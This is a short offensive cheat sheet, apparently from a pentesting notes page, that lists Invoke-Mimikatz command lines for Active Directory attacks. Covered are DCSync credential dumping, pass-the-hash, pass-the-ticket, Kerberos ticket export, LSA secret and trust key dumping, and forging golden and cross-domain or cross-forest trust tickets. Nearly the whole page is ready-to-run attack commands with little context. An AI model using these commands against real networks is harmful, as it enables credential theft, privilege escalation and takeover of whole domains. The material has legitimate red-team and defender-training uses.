Mimikatz
DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USER"'
Invoke-Mimikatz -Command '"lsadump::dcsync /all"'
# When DCsyncing and other actions you need to know the short hand of the domain.
# This can be found with Translate-Canonical
https://gist.github.com/HarmJ0y/4226349db644e6549605Pass-The-Ticket
Invoke-Mimikatz -Command '"kerberos::ptt TGS_ticket_file.kirbi"'Pass-The-Hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.local /ntlm:<ntlmhash> /run:powershell.exe"'Extract Tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'Dump Local Creds
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'Extract Trust Keys
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc Forge Golden Ticket
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'Forge Inter-Domain Trust Ticket
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-15-21-280534878-1496970234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"' Forge Inter-Forest Trust Ticket
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETFOREST.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'Last updated
Was this helpful?